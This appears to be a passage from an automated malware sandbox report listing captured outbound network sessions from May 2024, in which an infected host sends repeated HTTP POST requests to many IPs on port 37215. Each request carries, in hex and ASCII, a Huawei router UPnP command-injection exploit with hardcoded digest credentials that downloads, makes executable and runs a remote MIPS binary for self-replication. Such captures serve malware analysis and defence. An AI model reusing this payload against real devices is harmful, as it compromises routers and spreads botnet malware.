                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2228192.168.2.1560802221.48.240.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.289340973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2229192.168.2.153855241.67.185.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.289364100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2230192.168.2.1542470197.201.67.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.289385080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2231192.168.2.1538454197.171.173.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.289576054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2232192.168.2.1552932157.188.0.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.289597988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2233192.168.2.1552442197.190.102.24637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.295758009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2234192.168.2.1538876197.254.229.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.295787096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2235192.168.2.155226641.1.246.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.296592951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2236192.168.2.1536552210.130.251.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.302177906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2237192.168.2.153611866.152.196.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.303230047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 